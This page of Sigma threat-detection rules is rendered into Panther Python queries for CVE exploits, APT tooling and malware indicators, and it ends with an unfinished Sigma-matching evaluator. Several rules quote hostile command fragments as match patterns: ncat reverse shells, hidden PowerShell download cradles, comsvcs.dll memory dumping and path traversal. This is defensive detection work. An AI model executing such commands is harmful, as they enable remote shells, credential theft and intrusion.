Panther

3,750 rules · Sigma detections in Panther syntax
The same Sigma detection corpus, machine-rendered into Panther query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.

Detection rules

critical
Exploit for CVE-2015-1641
Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
status: stable · author: Florian Roth (Nextron Systems) · id: 7993792c-5ce2-4475-a3db-a3a5539827ef
panther query
def rule(event):
    if all(
        [
            event.deep_get("ParentImage", default="").endswith("\\WINWORD.EXE"),
            event.deep_get("Image", default="").endswith("\\MicroScMgmt.exe"),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Exploit for CVE-2015-1641
id: 7993792c-5ce2-4475-a3db-a3a5539827ef
status: stable
description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
references:
    - https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/
    - https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100
author: Florian Roth (Nextron Systems)
date: 2018-02-22
modified: 2021-11-27
tags:
    - attack.stealth
    - attack.t1036.005
    - cve.2015-1641
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\WINWORD.EXE'
        Image|endswith: '\MicroScMgmt.exe'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Exploit for CVE-2017-8759
Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
status: test · author: Florian Roth (Nextron Systems) · id: fdd84c68-a1f6-47c9-9477-920584f94905
panther query
def rule(event):
    if all(
        [
            event.deep_get("ParentImage", default="").endswith("\\WINWORD.EXE"),
            event.deep_get("Image", default="").endswith("\\csc.exe"),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Exploit for CVE-2017-8759
id: fdd84c68-a1f6-47c9-9477-920584f94905
status: test
description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
references:
    - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
    - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
author: Florian Roth (Nextron Systems)
date: 2017-09-15
modified: 2021-11-27
tags:
    - attack.execution
    - attack.t1203
    - attack.t1204.002
    - attack.initial-access
    - attack.t1566.001
    - cve.2017-8759
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\WINWORD.EXE'
        Image|endswith: '\csc.exe'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Exploiting CVE-2019-1388
Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
status: stable · author: Florian Roth (Nextron Systems) · id: 02e0b2ea-a597-428e-b04a-af6a1a403e5c
panther query
def rule(event):
    if all(
        [
            event.deep_get("ParentImage", default="").endswith("\\consent.exe"),
            event.deep_get("Image", default="").endswith("\\iexplore.exe"),
            " http" in event.deep_get("CommandLine", default=""),
            any(
                [
                    event.deep_get("IntegrityLevel", default="") in ["System", "S-1-16-16384"],
                    any(
                        [
                            "AUTHORI" in event.deep_get("User", default=""),
                            "AUTORI" in event.deep_get("User", default=""),
                        ]
                    ),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Exploiting CVE-2019-1388
id: 02e0b2ea-a597-428e-b04a-af6a1a403e5c
status: stable
description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
references:
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388
    - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
author: Florian Roth (Nextron Systems)
date: 2019-11-20
modified: 2024-12-01
tags:
    - attack.privilege-escalation
    - attack.t1068
    - cve.2019-1388
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        ParentImage|endswith: '\consent.exe'
        Image|endswith: '\iexplore.exe'
        CommandLine|contains: ' http'
    selection_rights:
        - IntegrityLevel:
              - 'System'  # for Sysmon users
              - 'S-1-16-16384' # System
        - User|contains: # covers many language settings
              - 'AUTHORI'
              - 'AUTORI'
    condition: all of selection_*
falsepositives:
    - Unknown
level: critical
critical
FlowCloud Registry Markers
Detects FlowCloud malware registry markers from threat group TA410. The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
status: test · author: NVISO · id: 5118765f-6657-4ddb-a487-d7bd673abbf1
panther query
def rule(event):
    if any(
        [
            "\\HARDWARE\\{2DB80286-1784-48b5-A751-B6ED1F490303}"
            in event.deep_get("TargetObject", default=""),
            "\\HARDWARE\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}"
            in event.deep_get("TargetObject", default=""),
            "\\HARDWARE\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}"
            in event.deep_get("TargetObject", default=""),
            "\\SYSTEM\\Setup\\PrintResponsor\\" in event.deep_get("TargetObject", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: FlowCloud Registry Markers
id: 5118765f-6657-4ddb-a487-d7bd673abbf1
status: test
description: |
    Detects FlowCloud malware registry markers from threat group TA410.
    The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
references:
    - https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
author: NVISO
date: 2020-06-09
modified: 2024-03-20
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - detection.emerging-threats
logsource:
    product: windows
    category: registry_event
detection:
    selection:
        TargetObject|contains:
            - '\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303}'
            - '\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}'
            - '\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}'
            - '\SYSTEM\Setup\PrintResponsor\'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
FoggyWeb Backdoor DLL Loading
Detects the DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor, which loads a malicious version of the expected "version.dll" DLL
status: test · author: Florian Roth (Nextron Systems) · id: 640dc51c-7713-4faa-8a0e-e7c0d9d4654c
panther query
def rule(event):
    if event.deep_get("ImageLoaded", default="") == "C:\\Windows\\ADFS\\version.dll":
        return True
    return False
view Sigma YAML
title: FoggyWeb Backdoor DLL Loading
id: 640dc51c-7713-4faa-8a0e-e7c0d9d4654c
status: test
description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
references:
    - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/
author: Florian Roth (Nextron Systems)
date: 2021-09-27
modified: 2022-12-09
tags:
    - attack.resource-development
    - attack.t1587
    - detection.emerging-threats
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded: 'C:\Windows\ADFS\version.dll'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
Fortinet CVE-2018-13379 Exploitation
Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs
status: test · author: Bhabesh Raj · id: a2e97350-4285-43f2-a63f-d0daff291738
panther query
def rule(event):
    if all(
        [
            "lang=/../../" in event.deep_get("cs-uri-query", default=""),
            "/dev/cmdb/sslvpn_websession" in event.deep_get("cs-uri-query", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Fortinet CVE-2018-13379 Exploitation
id: a2e97350-4285-43f2-a63f-d0daff291738
status: test
description: Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs
references:
    - https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/
author: Bhabesh Raj
date: 2020-12-08
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2018-13379
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection:
        cs-uri-query|contains|all:
            - 'lang=/../../'
            - '/dev/cmdb/sslvpn_websession'
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Fortinet CVE-2021-22123 Exploitation
Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs
status: test · author: Bhabesh Raj, Florian Roth · id: f425637f-891c-4191-a6c4-3bb1b70513b4
panther query
def rule(event):
    if all(
        [
            "/api/v2.0/user/remoteserver.saml" in event.deep_get("cs-uri-query", default=""),
            event.deep_get("cs-method", default="") == "POST",
            # filter1: exclude requests with the legitimate UI referer
            "/root/user/remote-user/saml-user/" not in event.deep_get("cs-referer", default=""),
            # filter2: exclude requests with no referer at all (Sigma `cs-referer: null`)
            event.deep_get("cs-referer", default="") != "",
        ]
    ):
        return True
    return False
view Sigma YAML
title: Fortinet CVE-2021-22123 Exploitation
id: f425637f-891c-4191-a6c4-3bb1b70513b4
status: test
description: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs
references:
    - https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection
author: Bhabesh Raj, Florian Roth
date: 2021-08-19
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2021-22123
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection:
        cs-uri-query|contains: '/api/v2.0/user/remoteserver.saml'
        cs-method: POST
    filter1:
        cs-referer|contains: '/root/user/remote-user/saml-user/'
    filter2:
        cs-referer: null
    condition: selection and not filter1 and not filter2
falsepositives:
    - Unknown
level: critical
critical
Goofy Guineapig Backdoor Service Creation
Detects service creation persistence used by the Goofy Guineapig backdoor
status: test · author: Nasreddine Bencherchali (Nextron Systems) · id: 8c15dd74-9570-4f48-80b2-29996fd91ee6
panther query
def rule(event):
    if all(
        [
            event.deep_get("Provider_Name", default="") == "Service Control Manager",
            event.deep_get("EventID", default="") == 7045,
            event.deep_get("ServiceName", default="") == "GoogleUpdate",
            "rundll32" in event.deep_get("ImagePath", default=""),
            "FileProtocolHandler" in event.deep_get("ImagePath", default=""),
            "\\ProgramData\\GoogleUpdate\\GoogleUpdate.exe"
            in event.deep_get("ImagePath", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Goofy Guineapig Backdoor Service Creation
id: 8c15dd74-9570-4f48-80b2-29996fd91ee6
status: test
description: Detects service creation persistence used by the Goofy Guineapig backdoor
references:
    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-15
tags:
    - attack.persistence
    - detection.emerging-threats
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
        ServiceName: 'GoogleUpdate'
        ImagePath|contains|all:
            - 'rundll32'
            - 'FileProtocolHandler'
            - '\ProgramData\GoogleUpdate\GoogleUpdate.exe'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
Grafana Path Traversal Exploitation CVE-2021-43798
Detects a successful Grafana path traversal exploitation
status: test · author: Florian Roth (Nextron Systems) · id: 7b72b328-5708-414f-9a2a-6a6867c26e16
panther query
def rule(event):
    if all(
        [
            "/../../../../../../../" in event.deep_get("cs-uri-query", default=""),
            event.deep_get("sc-status", default="") == 200,
            any(
                [
                    "/public/plugins/live" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/icon" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/loki" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/text" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/logs" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/news" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/stat" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/mssql" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/mixed" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/mysql" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/tempo" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/graph" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/gauge" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/table" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/debug" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/zipkin" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/jaeger" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/geomap" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/canvas" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/grafana" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/welcome" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/xychart" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/heatmap" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/postgres" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/testdata" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/opentsdb" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/influxdb" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/barchart" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/annolist" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/bargauge" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/graphite" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/dashlist" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/piechart" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/dashboard" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/nodeGraph" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/alertlist" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/histogram" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/table-old" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/pluginlist" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/timeseries" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/cloudwatch" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/prometheus" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/stackdriver" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/alertGroups" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/alertmanager" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/elasticsearch" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/gettingstarted" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/state-timeline" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/status-history" in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/grafana-clock-panel"
                    in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/grafana-simple-json-datasource"
                    in event.deep_get("cs-uri-query", default=""),
                    "/public/plugins/grafana-azure-monitor-datasource"
                    in event.deep_get("cs-uri-query", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Grafana Path Traversal Exploitation CVE-2021-43798
id: 7b72b328-5708-414f-9a2a-6a6867c26e16
status: test
description: Detects a successful Grafana path traversal exploitation
references:
    - https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/
    - https://github.com/search?q=CVE-2021-43798
author: Florian Roth (Nextron Systems)
date: 2021-12-08
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2021-43798
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection_traversal:
        cs-uri-query|contains: '/../../../../../../../'
        sc-status: 200
    selection_plugins:
        cs-uri-query|contains:
            - '/public/plugins/live'
            - '/public/plugins/icon'
            - '/public/plugins/loki'
            - '/public/plugins/text'
            - '/public/plugins/logs'
            - '/public/plugins/news'
            - '/public/plugins/stat'
            - '/public/plugins/mssql'
            - '/public/plugins/mixed'
            - '/public/plugins/mysql'
            - '/public/plugins/tempo'
            - '/public/plugins/graph'
            - '/public/plugins/gauge'
            - '/public/plugins/table'
            - '/public/plugins/debug'
            - '/public/plugins/zipkin'
            - '/public/plugins/jaeger'
            - '/public/plugins/geomap'
            - '/public/plugins/canvas'
            - '/public/plugins/grafana'
            - '/public/plugins/welcome'
            - '/public/plugins/xychart'
            - '/public/plugins/heatmap'
            - '/public/plugins/postgres'
            - '/public/plugins/testdata'
            - '/public/plugins/opentsdb'
            - '/public/plugins/influxdb'
            - '/public/plugins/barchart'
            - '/public/plugins/annolist'
            - '/public/plugins/bargauge'
            - '/public/plugins/graphite'
            - '/public/plugins/dashlist'
            - '/public/plugins/piechart'
            - '/public/plugins/dashboard'
            - '/public/plugins/nodeGraph'
            - '/public/plugins/alertlist'
            - '/public/plugins/histogram'
            - '/public/plugins/table-old'
            - '/public/plugins/pluginlist'
            - '/public/plugins/timeseries'
            - '/public/plugins/cloudwatch'
            - '/public/plugins/prometheus'
            - '/public/plugins/stackdriver'
            - '/public/plugins/alertGroups'
            - '/public/plugins/alertmanager'
            - '/public/plugins/elasticsearch'
            - '/public/plugins/gettingstarted'
            - '/public/plugins/state-timeline'
            - '/public/plugins/status-history'
            - '/public/plugins/grafana-clock-panel'
            - '/public/plugins/grafana-simple-json-datasource'
            - '/public/plugins/grafana-azure-monitor-datasource'
    condition: all of selection*
falsepositives:
    - Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error
level: critical
critical
Greenbug Espionage Group Indicators
Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
status: test · author: Florian Roth (Nextron Systems) · id: 3711eee4-a808-4849-8a14-faf733da3612
panther query
def rule(event):
    if any(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith(
                        ":\\ProgramData\\adobe\\Adobe.exe"
                    ),
                    event.deep_get("Image", default="").endswith(
                        ":\\ProgramData\\oracle\\local.exe"
                    ),
                    event.deep_get("Image", default="").endswith("\\revshell.exe"),
                    event.deep_get("Image", default="").endswith("\\infopagesbackup\\ncat.exe"),
                    event.deep_get("Image", default="").endswith(
                        ":\\ProgramData\\comms\\comms.exe"
                    ),
                ]
            ),
            all(
                [
                    "-ExecutionPolicy Bypass -File" in event.deep_get("CommandLine", default=""),
                    "\\msf.ps1" in event.deep_get("CommandLine", default=""),
                ]
            ),
            all(
                [
                    "infopagesbackup" in event.deep_get("CommandLine", default=""),
                    "\\ncat" in event.deep_get("CommandLine", default=""),
                    "-e cmd.exe" in event.deep_get("CommandLine", default=""),
                ]
            ),
            any(
                [
                    "system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill"
                    in event.deep_get("CommandLine", default=""),
                    "-nop -w hidden -c $k=new-object" in event.deep_get("CommandLine", default=""),
                    "[Net.CredentialCache]::DefaultCredentials;IEX "
                    in event.deep_get("CommandLine", default=""),
                    " -nop -w hidden -c $m=new-object net.webclient;$m"
                    in event.deep_get("CommandLine", default=""),
                    "-noninteractive -executionpolicy bypass whoami"
                    in event.deep_get("CommandLine", default=""),
                    "-noninteractive -executionpolicy bypass netstat -a"
                    in event.deep_get("CommandLine", default=""),
                ]
            ),
            "L3NlcnZlcj1" in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Greenbug Espionage Group Indicators
id: 3711eee4-a808-4849-8a14-faf733da3612
status: test
description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
references:
    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
author: Florian Roth (Nextron Systems)
date: 2020-05-20
modified: 2023-03-09
tags:
    - attack.stealth
    - attack.g0049
    - attack.execution
    - attack.t1059.001
    - attack.command-and-control
    - attack.t1105
    - attack.t1036.005
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - ':\ProgramData\adobe\Adobe.exe'
            - ':\ProgramData\oracle\local.exe'
            - '\revshell.exe'
            - '\infopagesbackup\ncat.exe'
            - ':\ProgramData\comms\comms.exe'
    selection_msf:
        CommandLine|contains|all:
            - '-ExecutionPolicy Bypass -File'
            - '\msf.ps1'
    selection_ncat:
        CommandLine|contains|all:
            - 'infopagesbackup'
            - '\ncat'
            - '-e cmd.exe'
    selection_powershell:
        CommandLine|contains:
            - 'system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill'
            - '-nop -w hidden -c $k=new-object'
            - '[Net.CredentialCache]::DefaultCredentials;IEX '
            - ' -nop -w hidden -c $m=new-object net.webclient;$m'
            - '-noninteractive -executionpolicy bypass whoami'
            - '-noninteractive -executionpolicy bypass netstat -a'
    selection_other:
        CommandLine|contains: 'L3NlcnZlcj1'  # base64 encoded '/server='
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical
critical
Griffon Malware Attack Pattern
Detects process execution patterns related to Griffon malware as reported by Kaspersky
status: test · author: Nasreddine Bencherchali (Nextron Systems) · id: bcc6f179-11cd-4111-a9a6-0fab68515cf7
panther query
def rule(event):
    if all(
        [
            "\\local\\temp\\" in event.deep_get("CommandLine", default=""),
            "//b /e:jscript" in event.deep_get("CommandLine", default=""),
            ".txt" in event.deep_get("CommandLine", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Griffon Malware Attack Pattern
id: bcc6f179-11cd-4111-a9a6-0fab68515cf7
status: test
description: Detects process execution patterns related to Griffon malware as reported by Kaspersky
references:
    - https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-03-09
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - '\local\temp\'
            - '//b /e:jscript'
            - '.txt'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
HAFNIUM Exchange Exploitation Activity
Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
status: test · author: Florian Roth (Nextron Systems) · id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7
panther query
def rule(event):
    if any(
        [
            all(
                [
                    "attrib" in event.deep_get("CommandLine", default=""),
                    " +h " in event.deep_get("CommandLine", default=""),
                    " +s " in event.deep_get("CommandLine", default=""),
                    " +r " in event.deep_get("CommandLine", default=""),
                    ".aspx" in event.deep_get("CommandLine", default=""),
                ]
            ),
            any(
                [
                    "\\ProgramData\\VSPerfMon\\" in event.deep_get("Image", default=""),
                    all(
                        [
                            "schtasks" in event.deep_get("CommandLine", default=""),
                            "VSPerfMon" in event.deep_get("CommandLine", default=""),
                        ]
                    ),
                ]
            ),
            all(
                [
                    event.deep_get("Image", default="").endswith("Opera_browser.exe"),
                    any(
                        [
                            event.deep_get("ParentImage", default="").endswith("\\services.exe"),
                            event.deep_get("ParentImage", default="").endswith("\\svchost.exe"),
                        ]
                    ),
                ]
            ),
            event.deep_get("Image", default="").endswith("Users\\Public\\opera\\Opera_browser.exe"),
            all(
                [
                    "vssadmin list shadows" in event.deep_get("CommandLine", default=""),
                    "Temp\\__output" in event.deep_get("CommandLine", default=""),
                ]
            ),
            all(
                [
                    event.deep_get("Image", default="").endswith("\\makecab.exe"),
                    "inetpub\\wwwroot\\" in event.deep_get("CommandLine", default=""),
                    ".dmp.zip" in event.deep_get("CommandLine", default=""),
                ]
            ),
            all(
                [
                    event.deep_get("Image", default="").endswith("\\makecab.exe"),
                    any(
                        [
                            "Microsoft\\Exchange Server\\"
                            in event.deep_get("CommandLine", default=""),
                            "compressionmemory" in event.deep_get("CommandLine", default=""),
                            ".gif" in event.deep_get("CommandLine", default=""),
                        ]
                    ),
                ]
            ),
            all(
                [
                    " -t7z " in event.deep_get("CommandLine", default=""),
                    "C:\\Programdata\\pst" in event.deep_get("CommandLine", default=""),
                    "\\it.zip" in event.deep_get("CommandLine", default=""),
                ]
            ),
            all(
                [
                    "\\comsvcs.dll" in event.deep_get("CommandLine", default=""),
                    "Minidump" in event.deep_get("CommandLine", default=""),
                    "full " in event.deep_get("CommandLine", default=""),
                    "\\inetpub\\wwwroot" in event.deep_get("CommandLine", default=""),
                ]
            ),
            any(
                [
                    "Windows\\Temp\\xx.bat" in event.deep_get("CommandLine", default=""),
                    "Windows\\WwanSvcdcs" in event.deep_get("CommandLine", default=""),
                    "Windows\\Temp\\cw.exe" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: HAFNIUM Exchange Exploitation Activity
id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7
status: test
description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
references:
    - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/
    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
    - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3
    - https://twitter.com/GadixCRK/status/1369313704869834753?s=20
    - https://twitter.com/BleepinComputer/status/1372218235949617161
author: Florian Roth (Nextron Systems)
date: 2021-03-09
modified: 2023-03-09
tags:
    - attack.privilege-escalation
    - attack.execution
    - attack.persistence
    - attack.t1546
    - attack.t1053
    - attack.g0125
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_attrib:
        CommandLine|contains|all:
            - 'attrib'
            - ' +h '
            - ' +s '
            - ' +r '
            - '.aspx'
    selection_vsperfmon:
        - Image|contains: '\ProgramData\VSPerfMon\'
        - CommandLine|contains|all:
              - 'schtasks'
              - 'VSPerfMon'
    selection_opera_1:
        Image|endswith: 'Opera_browser.exe'
        ParentImage|endswith:
            - '\services.exe'
            - '\svchost.exe'
    selection_opera_2:
        Image|endswith: 'Users\Public\opera\Opera_browser.exe'
    selection_vssadmin:
        CommandLine|contains|all:
            - 'vssadmin list shadows'
            - 'Temp\__output'
    selection_makecab_1:
        Image|endswith: '\makecab.exe'
        CommandLine|contains|all:
            - 'inetpub\wwwroot\'
            - '.dmp.zip'
    selection_makecab_2:
        Image|endswith: '\makecab.exe'
        CommandLine|contains:
            - 'Microsoft\Exchange Server\'
            - 'compressionmemory'
            - '.gif'
    selection_7zip:
        CommandLine|contains|all:
            - ' -t7z '
            - 'C:\Programdata\pst'
            - '\it.zip'
    selection_rundll32:
        CommandLine|contains|all:
            - '\comsvcs.dll'
            - 'Minidump'
            - 'full '
            - '\inetpub\wwwroot'
    selection_other:
        CommandLine|contains:
            - 'Windows\Temp\xx.bat'
            - 'Windows\WwanSvcdcs'
            - 'Windows\Temp\cw.exe'
    condition: 1 of selection*
falsepositives:
    - Unlikely
level: critical
critical
HackTool - BabyShark Agent Default URL Pattern
Detects Baby Shark C2 Framework default communication patterns
status test author Florian Roth (Nextron Systems) id 304810ed-8853-437f-9e36-c4975c3dfd7e
panther query
def rule(event):
    # Sigma '\?' is an escaped, literal '?', so the URI substring carries no backslash
    if "momyshark?key=" in event.deep_get("c-uri", default=""):
        return True
    return False
view Sigma YAML
title: HackTool - BabyShark Agent Default URL Pattern
id: 304810ed-8853-437f-9e36-c4975c3dfd7e
status: test
description: Detects Baby Shark C2 Framework default communication patterns
references:
    - https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845
author: Florian Roth (Nextron Systems)
date: 2021-06-09
modified: 2024-02-15
tags:
    - attack.command-and-control
    - attack.t1071.001
logsource:
    category: proxy
detection:
    selection:
        c-uri|contains: 'momyshark\?key='
    condition: selection
falsepositives:
    - Unlikely
level: critical
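The Panther renderings on this page turn each Sigma selection into Python `in` and `endswith` checks, and the BabyShark rule just above shows one place where that translation needs care: in Sigma, `?` is a single-character wildcard and `\?` is an escaped, literal question mark, so the substring to look for is `momyshark?key=` with no backslash. Sigma's `contains` is also case-insensitive, whereas Python's `in` is not. As an added example, not code from this page or from the Sigma or Panther projects, here is a small evaluator for the Sigma constructs the HAFNIUM and BabyShark rules use (`contains`/`endswith` with and without `|all`, lists as OR, list-of-maps selections as OR, and the `1 of selection*` condition) with Sigma's wildcard escaping and case folding, run over constructed process_creation and proxy events. The rule dictionaries are transcribed by hand from the YAML above (three of the HAFNIUM selections plus the BabyShark selection); the sample events and all helper names are made up for the example.

```python
import re

# Added example: a small evaluator for the Sigma constructs used by the rules on
# this page. Sigma string matching is case-insensitive; '*' and '?' are wildcards
# and a backslash before them makes them literal, so '\?' in the BabyShark rule
# means a literal question mark.


def sigma_pattern(value, mode):
    """Compile one Sigma string value into a regex for mode contains/startswith/endswith/exact."""
    out, i = [], 0
    while i < len(value):
        c = value[i]
        if c == "\\" and i + 1 < len(value) and value[i + 1] in "*?\\":
            out.append(re.escape(value[i + 1]))  # escaped wildcard or backslash: literal
            i += 2
            continue
        out.append(".*" if c == "*" else "." if c == "?" else re.escape(c))
        i += 1
    body = "".join(out)
    wrap = {"contains": ".*%s.*", "startswith": "%s.*", "endswith": ".*%s"}
    return re.compile("^" + (wrap.get(mode, "%s") % body) + "$", re.IGNORECASE | re.DOTALL)


def match_field(event, spec, values):
    """Evaluate one 'Field|modifier...: value or [values]' entry against a flat event dict."""
    field, *mods = spec.split("|")
    mode = next((m for m in mods if m in ("contains", "startswith", "endswith")), "exact")
    actual = event.get(field)
    if actual is None:  # field absent from the event: this entry cannot match
        return False
    values = values if isinstance(values, list) else [values]
    hits = [sigma_pattern(str(v), mode).match(str(actual)) is not None for v in values]
    return all(hits) if "all" in mods else any(hits)  # a value list is OR unless |all


def match_selection(event, selection):
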